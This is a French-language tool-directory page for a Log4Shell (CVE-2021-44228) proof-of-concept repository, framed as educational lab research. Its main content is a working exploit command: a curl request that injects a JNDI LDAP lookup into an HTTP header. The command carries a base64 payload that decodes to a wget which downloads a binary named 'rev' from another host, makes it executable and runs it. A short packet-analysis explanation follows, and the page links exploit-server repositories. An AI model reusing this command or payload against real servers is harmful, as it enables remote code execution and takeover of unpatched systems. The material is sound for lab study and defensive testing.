Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
LOG4J-CVE-2021-44228 — Preuve de concept d'exploitation pour Log4Shell (CVE-2021-44228) avec configuration du serveur LDAP, génération de charge utile et analyse de capture de paquets pour la recherche éducative sur les vulnérabilités. | Kitploit
Outils/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
Sniffing et Analyse de PaquetsGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept d'exploitation pour Log4Shell (CVE-2021-44228) avec configuration du serveur LDAP, génération de charge utile et analyse de capture de paquets pour la recherche éducative sur les vulnérabilités.

Voir le dépôt
il y a 3 ansPas encore vérifié

LOG4J-CVE-2021-44228

Log4Shell — également connu sous le nom de CVE-2021-44228 — est une vulnérabilité critique qui permet l'exécution de code à distance dans les systèmes utilisant Log4j de la Fondation Apache, qui est une bibliothèque Java open-source largement utilisée dans les produits logiciels commerciaux et open-source ainsi que dans les utilitaires

0_6ImDNNYn_uGlIgog

Analyse du POC

Le serveur vulnérable fonctionne sur le port 8080

Screenshot 2023-04-11 115553

Et le serveur ldap fonctionne sur deux ports : http 8888 et ldap 1389

Screenshot 2023-04-11 115631

COMMANDE D'EXPLOITATION

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- Adresse IP du serveur vulnérable

172.17.0.1:1389 -- Adresse IP du serveur LDAP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

Commande déchiffrée - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

ANALYSE DES PAQUETS

PACKETS

flowgraph

COMME NOUS POUVONS LE VOIR DANS LES PAQUETS, LE SERVEUR ENVOIE UNE REQUÊTE GET POUR UNE CLASSE AU SERVEUR LDAP. SI NOUS VÉRIFIONS LA CLASSE D'EXPLOITATION, NOUS POUVONS VOIR QUE LE SERVEUR LDAP ENVOIE LA COMMANDE DÉCHIFFRÉE DANS LA CLASSE D'EXPLOITATION.

EXP_CLASS

Références

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

Télécharger l’outil